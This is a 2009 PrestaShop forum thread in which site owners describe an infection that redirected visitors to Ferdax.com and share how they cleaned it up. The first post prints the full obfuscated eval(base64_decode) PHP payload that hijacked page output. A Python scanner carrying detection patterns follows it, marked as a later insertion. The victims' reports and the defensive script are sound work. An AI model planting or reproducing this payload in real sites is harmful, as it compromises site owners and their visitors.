PrestaShop Forums: Security attack by Ferdax.com - PrestaShop Forums


Security attack by Ferdax.com


#1 yebberdog

    PrestaShop Apprentice

  • 02 Jul 2009
  • Members
  • 40 posts

Posted 16 November 2009 - 10:17 AM

I have just been made aware that my PrestaShop installation was compromised and hacked one day after installation back in October 2009. It has just come to light because we noticed that the click-through on our AdWords account did not match the stats on the site. When we clicked on a typical ad for our site we were redirected to a site called Ferdax.com and then to a separate search site. This happened only periodically and not every time you clicked the ad; the same was happening on general search links. What brought me to believe it was an attack on my site was that the actual link data passed by Google was the same regardless of whether it redirected to Ferdax.com.

After hours of searching and undertaking virus and malware checks on my site, I noticed that the majority of index.php files throughout the site have become corrupted with the following code:

<? /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvaG9tZS9jb29sdHJvbi9wdWJsaWNfaHRtbC9wcm9tb3Rlay5jby51ay96ZW5jYXJ0L2luY2x1ZGVzL2xhbmd1YWdlcy9lbmdsaXNoL2h0bWxfaW5jbHVkZXMvc3R5bGUuY3NzLnBocCcpKXtpbmNsdWRlX29uY2UoJy9ob21lL2Nvb2x0cm9uL3B1YmxpY19odG1sL3Byb21vdGVrLmNvLnVrL3plbmNhcnQvaW5jbHVkZXMvbGFuZ3VhZ2VzL2VuZ2xpc2gvaHRtbF9pbmNsdWRlcy9zdHlsZS5jc3MucGhwJyk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmIWZ1bmN0aW9uX2V4aXN0cygnZGdvYmgnKSl7aWYoIWZ1bmN0aW9uX2V4aXN0cygnZ3pkZWNvZGUnKSl7ZnVuY3Rpb24gZ3pkZWNvZGUoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCl7JFI2QjZFOThDREU4QjMzMDg3QTMzRTREM0E0OTdCRDg2Qj1vcmQoc3Vic3RyKCRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4NjgsMywxKSk7JFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MT0xMDskUjBENTQyMzZEQTIwNTk0RUMxM0ZDODFCMjA5NzMzOTMxPTA7aWYoJFI2QjZFOThDREU4QjMzMDg3QTMzRTREM0E0OTdCRDg2QiY0KXskUjBENTQyMzZEQTIwNTk0RUMxM0ZDODFCMjA5NzMzOTMxPXVucGFjaygndicsc3Vic3RyKCRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4NjgsMTAsMikpOyRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE9JFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMVsxXTskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKz0yKyRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE7fWlmKCRSNkI2RTk4Q0RFOEIzMzA4N0EzM0U0RDNBNDk3QkQ4NkImOCl7JFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MT1zdHJwb3MoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCxjaHIoMCksJFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MSkrMTt9aWYoJFI2QjZFOThDREU4QjMzMDg3QTMzRTREM0E0OTdCRDg2QiYxNil7JFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MT1zdHJwb3MoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCxjaHIoMCksJFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MSkrMTt9aWYoJFI2QjZFOThDREU4QjMzMDg3QTMzRTREM0E0OTdCRDg2QiYyKXskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKz0yO30kUkM0QTVCNUUzMTBFRDRDMzIzRTA0RDcyQUZBRTM5RjUzPWd6aW5mbGF0ZShzdWJzdHIoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCwkUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKSk7aWYoJFJDNEE1QjVFMzEwRUQ0QzMyM0UwNEQ3MkFGQUUzOUY1M
z09PUZBTFNFKXskUkM0QTVCNUUzMTBFRDRDMzIzRTA0RDcyQUZBRTM5RjUzPSRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4Njg7fXJldHVybiAkUkM0QTVCNUUzMTBFRDRDMzIzRTA0RDcyQUZBRTM5RjUzO319ZnVuY3Rpb24gZGdvYmgoJFJEQTNFNjE0MTRFNTBBRUU5NjgxMzJGMDNEMjY1RTBDRil7SGVhZGVyKCdDb250ZW50LUVuY29kaW5nOiBub25lJyk7JFIzRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MD1nemRlY29kZSgkUkRBM0U2MTQxNEU1MEFFRTk2ODEzMkYwM0QyNjVFMENGKTtpZihwcmVnX21hdGNoKCcvXDxib2R5L3NpJywkUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwKSl7cmV0dXJuIHByZWdfcmVwbGFjZSgnLyhcPGJvZHlbXlw+XSpcPikvc2knLCckMScuZ21sKCksJFIzRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MCk7fWVsc2V7cmV0dXJuIGdtbCgpLiRSM0UzM0UwMTdDRDc2QjlCN0U2QzczNjRGQjkxRTJFOTA7fX1vYl9zdGFydCgnZGdvYmgnKTt9fX0=')); ?>


I am no expert, but there seems to have been a similar problem with ZenCart which has been highlighted in the forums. I have no idea what the above means or how my site was hacked; however, I would raise this as something that needs to be investigated.

At the moment I have simply gone through the whole site and removed this from all index.php files. It was quite easy to find them, as the modification date was different by one day and it only related to the index.php files.

Look forward to any comments regarding this. By the way, I am using PrestaShop Version 1.2.4.0.


Specialising in ecommerce solutions, social media marketing, CMS website and development

www.mulberryecommerce.co.uk
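A defender-side triage script, added here and not part of yebberdog's post, that does what the manual cleanup above describes: it walks a web root, flags PHP files carrying an `eval(base64_decode(...))` stub, decodes that first layer as text without executing it to look for the `ob_start`/`include_once` markers, and also flags files under the site that have an image extension but start with a PHP tag (the disguised files post #3 mentions). The web-root layout and the short payload it builds are constructed samples, not the thread's real blob.

```python
import base64
import re
import tempfile
from pathlib import Path

# The injection shown in the thread: eval(base64_decode('<blob>')) at the top of index.php.
# The blob is captured so it can be decoded for triage without ever being executed.
INJECT_RE = re.compile(r"eval\s*\(\s*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)\s*\)")
# Markers that, in the decoded layer, point at an output-buffer hijack rather than benign code.
SUSPICIOUS_TOKENS = ("ob_start", "include_once", "gzinflate", "preg_replace")
IMAGE_SUFFIXES = {".gif", ".jpg", ".jpeg", ".png"}

def decode_layer(blob):
    """Decode one base64 layer as text; return '' if the blob is not valid base64."""
    try:
        return base64.b64decode(blob, validate=True).decode("latin-1")
    except ValueError:  # binascii.Error is a ValueError subclass
        return ""

def scan_webroot(root):
    """Return findings: files with the eval/base64 stub, plus 'images' that are really PHP."""
    root = Path(root)
    findings = []
    for path in sorted(p for p in root.rglob("*") if p.is_file()):
        data = path.read_bytes()
        rel = path.relative_to(root).as_posix()
        if path.suffix.lower() in IMAGE_SUFFIXES and b"<?" in data[:64]:
            findings.append({"file": rel, "kind": "php-in-image", "tokens": []})
            continue
        for m in INJECT_RE.finditer(data.decode("latin-1")):
            decoded = decode_layer(m.group(1))
            findings.append({"file": rel, "kind": "eval-base64",
                             "mtime": int(path.stat().st_mtime),  # compare against install date
                             "tokens": [t for t in SUSPICIOUS_TOKENS if t in decoded],
                             "decoded_prefix": decoded[:60]})
    return findings

def build_sample_site():
    """Constructed throwaway web root: a clean index.php, an injected one and a fake image."""
    root = Path(tempfile.mkdtemp())
    (root / "index.php").write_text("<?php\ninclude(dirname(__FILE__).'/config/config.inc.php');\n")
    (root / "modules").mkdir()
    # Stand-in for the real blob: decodes to an inert string carrying the same marker call.
    payload = base64.b64encode(b"if(function_exists('ob_start')){ob_start('cb');}").decode()
    (root / "modules" / "index.php").write_text(f"<? /**/eval(base64_decode('{payload}')); ?>\n")
    (root / "img").mkdir()
    (root / "img" / "logo.gif").write_bytes(b"<?php echo 'not an image'; ?>")
    return str(root)
```

Run `scan_webroot("/path/to/webroot")` against a real site and sort the findings by `mtime`; a cluster of files sharing one modification date, as the post describes, is the set to restore from a clean copy.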


#2

    PrestaShop Newbie

  • 15 Dec 2011
  • Members
  • 0 posts

Posted 18 November 2009 - 10:59 AM

Hi there!
I also got this on all my sites some days ago. It took time to clean; I used a search and replace program for all files.

It's "gifimg.php"; search on Google and you will find more info.

What I think it really is, is that malware on your computer has maybe taken your credentials, so check for rootkit viruses, and update Adobe Reader and Flash Player (early versions are apparently easy to hijack).

#3

    PrestaShop Newbie

  • 15 Dec 2011
  • Members
  • 0 posts

Posted 19 November 2009 - 01:34 PM

Hi Tobias

Thanks for your reply

After a lot of research I think you are right. I managed to get my server provider to run a find and replace on all files, and then I undertook a virus scan through cPanel and found a virus. I also undertook further security measures as outlined through my research on the web, and the problem seems to have been rectified and all is working normally. Also make sure a full virus scan is undertaken on your local computer, as the same virus pulls FTP information from your computer.

This virus also attacks any PHP files, but mainly index.php, and also implants files in the image directory disguised as images.

Regards

#4

    PrestaShop Newbie

  • 15 Dec 2011
  • Members
  • 0 posts

Posted 20 November 2009 - 12:10 PM

Hi again.

Sounds good that it worked out for you.

Although I'm not that lucky myself :/ I got it back just now again after "thinking" I'm clean for a couple of days.

You wrote you took: "Also undertook further security measure as outlined through my research on the web and the problem seems to have been rectified and all is working normally."

Please do write/PM more information on what you did; it would be great to find out. How do you mean you did a virus scan through cPanel on the service provider? You mean that the service provider can have the virus? (The service provider I'm using says I'm the only one affected atm by this.)

What kind of virus did you have on your computer and with what program did you remove it?

Appreciate all help :)

#5

    PrestaShop Newbie

  • 15 Dec 2011
  • Members
  • 0 posts

Posted 08 February 2010 - 01:54 PM

Hi
There is a code to clean all files here: http://www.prestasho..._et_repiratage/
